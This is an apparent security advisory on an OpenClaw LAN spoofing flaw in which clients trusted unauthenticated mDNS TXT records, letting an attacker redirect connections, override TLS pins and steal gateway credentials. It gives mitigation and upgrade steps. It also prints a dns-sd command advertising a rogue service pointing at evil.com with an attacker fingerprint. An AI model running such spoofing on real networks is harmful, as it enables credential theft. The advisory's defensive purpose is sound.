Listen to this Post
The vulnerability resides in how OpenClaw clients handle discovery protocols (Bonjour/mDNS and DNS-SD) on a local network. These protocols use unauthenticated TXT records to broadcast service details. Prior to the fix, iOS and macOS clients trusted the `lanHost` and `tailnetDns` TXT values as authoritative routing hints to build connection URLs, and both iOS and Android clients allowed the `gatewayTlsSha256` TXT fingerprint to override a previously stored TLS pin. An attacker on a shared or untrusted LAN can advertise a rogue `_openclaw-gw._tcp` service with malicious TXT records. This can trick a client into connecting to an attacker-controlled endpoint and accepting a fraudulent certificate, leading to the exfiltration of gateway credentials (auth.token or auth.password).
dailycve form:
Platform: OpenClaw
Version: <= 2026.2.13
Vulnerability: LAN Spoofing
Severity: Medium
date: Feb 18 2026
Prediction: Feb 19 2026
What Undercode Say:
Analytics:
The vulnerability affects alpha builds for iOS and Android not broadly shipped, plus any client relying on discovery on untrusted LANs. The fix introduces validation to prefer resolved SRV records over TXT hints, prevents fingerprint override, and requires explicit user confirmation for first-time TLS pins.
Bash Commands/Codes:
Check installed openclaw version npm list openclaw Simulate a malicious advertisement (for testing purposes only) dns-sd -R _openclaw-gw._tcp local. 80 lanHost=evil.com gatewayTlsSha256=ATTACKER_FINGERPRINT Verify patch application (commit d583782) cd /path/to/openclaw && git log --oneline | grep d583782 Upgrade to patched version npm install [email protected] --save
How Exploit:
Attacker on same LAN advertises malicious `_openclaw-gw._tcp` service with crafted TXT records. Vulnerable client automatically trusts these unauthenticated values, connects to attacker IP/port, accepts attacker TLS certificate due to pin override, and sends gateway credentials.
Protection from this CVE:
Upgrade to openclaw >= 2026.2.14. Until patched, avoid using OpenClaw on untrusted networks (public Wi-Fi) and disable discovery-based auto-connect features. Network segmentation and firewall rules blocking mDNS (port 5353) between untrusted zones also mitigate.
Impact:
Credential theft allowing attacker to impersonate gateway, access connected services, and pivot within infrastructure. Limited to LAN adjacency and alpha client exposure but enables complete compromise of affected gateway sessions.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

